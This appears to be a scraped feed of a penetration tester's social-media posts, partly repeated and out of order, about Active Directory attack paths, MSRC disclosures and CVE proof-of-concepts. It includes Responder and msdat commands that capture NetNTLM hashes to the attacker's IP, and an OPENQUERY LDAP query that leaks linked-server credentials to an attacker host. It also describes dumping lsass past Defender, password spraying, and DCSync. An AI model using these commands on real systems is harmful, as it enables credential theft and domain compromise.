Spooler service disabled, RPC filters installed to prevent PetitPotam and File Server VSS Agent Service not installed but you still want to relay DC authentication to ADCS?
Don't worry MS-DFSNM have your back ;)
One funny way to use procdump to dump lsass and not get flagged by defender is to redirect it to smb share where only current user can authenticate (you can use dummy user with runas /netonly). Defender will not be able to scan dump file and will not flag it.
So MSRC first say that they cannot reproduce ,now say that no security boundary is crossed. Tested this on few different machines and it was successful on all of them.
This is bug in GamingServices , non default service so impact is not high.
One of paths to DA in current engagement.
Run gowitneess and take screenshot of servers in scope.
Identified Cisco Unified Call Manager on one of the servers. Used SeeYouCM Thief to enumerate AD users.
Used kerbute to spray password and get one hit. 1/n
I published my PoC for CVE-2023-36047 as MSRC fixed the bypass today tracked as CVE-2024-21447. With some modification can be ported for CVE-2024-21447.
So MSRC first say that they cannot reproduce ,now say that no security boundary is crossed. Tested this on few different machines and it was successful on all of them.
This is bug in GamingServices , non default service so impact is not high.
First CVE in 2024 :)
This was arbitrary file DACL reset vulnerability with a little twist and thats that file permissions where copied from parent folder which prevented me from using the usual suspects (PrintConfig.dll etc) during the exploitation.
Have a valid creds for mssql db and xp_dirtree is enabled?
Use msdat and responder to capture netntlm hashes
1: responder -I eth0 -v
2: ./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture $MY_IP_ADDRESS --share-name $SHARE
#infosec
#hacking
Here is small code to dump SAM/SYSTEM/SECURITY hives from remote host when you have SeBackup/SeRestore privileges (Backup Operators) : . Files will be saved on remote host but backup operators can access c$ and download it.
I reported bypass for a lame patch in Sysmon.
MSRC confirms the bypass, they release new sysmon version that apparently fixes the bug.
And this is response I get for asking if they will give cve as I didn't get any notification from them that they fixed bug.
Here is my PoC for CVE-2023-20178 / Arbitrary File Delete vulnerability in Cisco Secure Client and Cisco AnyConnect which was fixed earlier this month.
TIL: If you have GenericAll right's on AD Container ,in this case Program Data (i assume it works on others too), you can add new computer/user objects even if you are not DA/SemachineAccountPrivilege is disabled.
For those intrested in details about Sysmon vulnerability, at the moment i cannot share any details as fix implemented by MSRC is pretty lazy and vulnerability still exists and MSRC have been notified about bypass
Can trigger authentication on DC without credentials with Petitpotam but there is no ADCS? Relay to smb on other hosts with socks option in ntlmrelayx and use printnightmare through relayed connection and trigger it without having any credentials 🙃
I reported bypass for a lame patch in Sysmon.
MSRC confirms the bypass, they release new sysmon version that apparently fixes the bug.
And this is response I get for asking if they will give cve as I didn't get any notification from them that they fixed bug.
Eset fixed a vulnerability I found a couple of months ago. This was arbitrary folder content delete bug, which I was able to turn in arbitrary file move and gain system shell.
Looks like microsoft killed the abuse of arbitrary folder creation using SxS assembly trick. Tested wermgr.exe/narrator.exe/werfault.exe and some of my own that were not public and they will not try to open .local directory on fully update win10/win11. :(
I was able to leak credentials of user configured for linked server using following query
SELECT * FROM OPENQUERY(linkedserver, 'SELECT sAMAccountName FROM ''LDAP://<kali ip>/DC=somedomain,DC=local'''). 3/n
Congratulations to our MSRC 2023 Most Valuable Researchers! Thank you to all the researchers who have helped secure our customers. 👏🎉
Check out our blog for the full list:
Anyone have idea why its possible to relay to yourself when using KrbRelay? I am on DC and relayed auth to same DC on ldap service. This should not work right? or relay to same host is only restricted for NTLM ?
@DebugPrivilege
Compromised user that could set RBCD on DC but all domain admins where in protected users group so I impersonated DC itself and did a DCSync :)
Me: submit report with PoC and poc video how to do everything.
Triage: (Do the opposite of what i showed in video) Can't reproduce
FFS how these people get their jobs
Congratulations to all the researchers recognized in this quarter’s MSRC 2023 Q2 Security Researcher Leaderboard!
For more information, check out our blog post:
#cybersecurity
#securityresearch
#msrc
One of paths to DA in current engagement.
Run gowitneess and take screenshot of servers in scope.
Identified Cisco Unified Call Manager on one of the servers. Used SeeYouCM Thief to enumerate AD users.
Used kerbute to spray password and get one hit. 1/n
Feels good to be able to bench more (slightly more) than my current body weight 😊. The last time I was able to do that was almost 4 years ago. Now it's time to chase old PB's and set some new ones!
Used obtained credentials to try to authenticate on available MSSQL servers. Got few successful logins.
On one of SQL servers had few linked servers configured , few of them where using ADSDSOObject provider (for integration with AD). 2/n